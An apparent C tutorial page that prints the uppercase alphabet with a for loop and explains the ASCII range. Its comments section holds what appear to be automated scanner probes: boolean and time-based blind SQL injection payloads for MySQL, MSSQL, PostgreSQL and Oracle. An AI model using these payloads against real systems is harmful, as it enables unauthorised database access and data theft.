C Program to print all the English Alphabets in Upper case
Output:
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Program or Solution
#include<stdio.h>
int main()
{
int i;
for(i='A';i<='Z';i++)
{
printf("%c",i);
}
return 0;
}
Program Explanation
Instruction(s) inside the for block{} are executed repeatedly till the second expression is true.
Here i is initialized to A(65) and incremented by 1 for each iteration, instructions inside the for block are executed unless i becomes greater than Z(90).
so value of i will be printed as character like AB C....Z using printf statement and format specifier %c.
Comments
ubaTaeCJ
-1 OR 2+308-308-1=0+0+0+1 --ubaTaeCJ
-1 OR 3+308-308-1=0+0+0+1 --ubaTaeCJ
-1 OR 3*2<(0+5+308-308) --ubaTaeCJ
-1 OR 3*2>(0+5+308-308) --ubaTaeCJ
-1 OR 2+948-948-1=0+0+0+1ubaTaeCJ
-1 OR 3+948-948-1=0+0+0+1ubaTaeCJ
-1 OR 3*2<(0+5+948-948)ubaTaeCJ
-1 OR 3*2>(0+5+948-948)ubaTaeCJ
-1' OR 2+267-267-1=0+0+0+1 --ubaTaeCJ
-1' OR 3+267-267-1=0+0+0+1 --ubaTaeCJ
-1' OR 3*2<(0+5+267-267) --ubaTaeCJ
-1' OR 3*2>(0+5+267-267) --ubaTaeCJ
-1' OR 2+583-583-1=0+0+0+1 or 'iNtMYQQs'='ubaTaeCJ
-1' OR 3+583-583-1=0+0+0+1 or 'iNtMYQQs'='ubaTaeCJ
-1' OR 3*2<(0+5+583-583) or 'iNtMYQQs'='ubaTaeCJ
-1' OR 3*2>(0+5+583-583) or 'iNtMYQQs'='ubaTaeCJ
-1" OR 2+910-910-1=0+0+0+1 --ubaTaeCJ
-1" OR 3+910-910-1=0+0+0+1 --ubaTaeCJ
-1" OR 3*2<(0+5+910-910) --ubaTaeCJ
-1" OR 3*2>(0+5+910-910) --ubaTaeCJ
if(now()=sysdate(),sleep(15),0)ubaTaeCJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'ZubaTaeCJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"ZubaTaeCJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ubaTaeCJ
-1; waitfor delay '0:0:15' --ubaTaeCJ
-1); waitfor delay '0:0:15' --ubaTaeCJ
1 waitfor delay '0:0:6' --ubaTaeCJ
SgU8gy58'; waitfor delay '0:0:15' --ubaTaeCJ
-5 OR 955=(SELECT 955 FROM PG_SLEEP(15))--ubaTaeCJ
-5) OR 527=(SELECT 527 FROM PG_SLEEP(15))--ubaTaeCJ
-1)) OR 508=(SELECT 508 FROM PG_SLEEP(15))--ubaTaeCJ
Pj6q2a26' OR 192=(SELECT 192 FROM PG_SLEEP(15))--ubaTaeCJ
nkyzMfHR') OR 617=(SELECT 617 FROM PG_SLEEP(15))--ubaTaeCJ
IHq99kHA')) OR 324=(SELECT 324 FROM PG_SLEEP(15))--ubaTaeCJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)ubaTaeCJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'ubaTaeCJ
1'"ubaTaeCJ
@@UgfJ3Related Programs
- C Program to print N Natural numbers
- C Program to print Whole numbers till N
- C Program to print ODD numbers till N
- C Program to print Even numbers till N
- C Program to print N Natural numbers in reverse
- C Program to calculate sum of First N Natural numbers
- C Program to print N ODD numbers
- C Program to print N Even numbers
- C Program to calculate sum of Even numbers till N
- C Program to calculate sum of ODD numbers till N
- C Program to calculate sum of N given numbers
- C Program to print Hello World for N times
- C Program to print the first digit of a given number
- C Program to find whether the first digit of given number is odd or even
- C Program to multiply two numbers without using * operator
- C Program to find N power of M (Exponentiation) without using predefined function
- C Program to print Multiplication table of N
- C Program to print Multiplication table of N till M rows
- C Program to calculate sum of multiple positive numbers (Stop if user enters negative number)
- C Program to calculate sum of N positive numbers(Skip the negative number and get another instated of that)
- C Program to calculate sum of N positive numbers(Accept the negative number And don?t include in sum)
- C Program to print all the English Alphabets in lower case
- C Program to print English Alphabets between two Alphabets
- C Program to print Lower case English Alphabets in reverse
- C Program to covert decimal to binary number
- C Program to convert binary todecimal number
coming Soon
coming Soon